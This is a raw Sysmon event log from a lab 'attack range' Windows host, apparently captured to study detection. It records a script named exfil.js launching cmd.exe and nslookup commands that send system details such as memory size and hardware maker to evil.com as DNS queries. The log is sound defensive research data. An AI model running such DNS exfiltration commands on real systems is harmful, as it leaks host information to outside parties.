14:21:23.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.628{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.628{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7C42-000000005F02}8128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.628{2E1864BB-18E0-629A-6742-000000005F02}39764596C:\Windows\System32\WScript.exe{2E1864BB-18E3-629A-7C42-000000005F02}8128C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.631{2E1864BB-18E3-629A-7C42-000000005F02}8128C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnjp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.613{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxuc.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.581{2E1864BB-18E3-629A-7A42-000000005F02}11444836C:\Windows\system32\conhost.exe{2E1864BB-18E3-629A-7B42-000000005F02}7076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.566{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7B42-000000005F02}7076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.566{2E1864BB-18E3-629A-7942-000000005F02}54883300C:\Windows\system32\cmd.exe{2E1864BB-18E3-629A-7B42-000000005F02}7076C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.579{2E1864BB-18E3-629A-7B42-000000005F02}7076C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E3-629A-7942-000000005F02}5488C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxuc.tmp 2>&1 10341000x8000000000000000206160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.517{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E3-629A-7A42-000000005F02}1144C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.514{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E3-629A-7A42-000000005F02}1144C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.500{2E1864BB-18E3-629A-7A42-000000005F02}11444836C:\Windows\system32\conhost.exe{2E1864BB-18E3-629A-7942-000000005F02}5488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.480{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7A42-000000005F02}1144C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.471{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.471{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.470{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.467{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.466{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7942-000000005F02}5488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.466{2E1864BB-18E0-629A-6742-000000005F02}39765576C:\Windows\System32\WScript.exe{2E1864BB-18E3-629A-7942-000000005F02}5488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.461{2E1864BB-18E3-629A-7942-000000005F02}5488C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxuc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.455{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlycdh.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.416{2E1864BB-18E3-629A-7742-000000005F02}27927900C:\Windows\system32\conhost.exe{2E1864BB-18E3-629A-7842-000000005F02}5604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.409{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7842-000000005F02}5604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.401{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.401{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.401{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 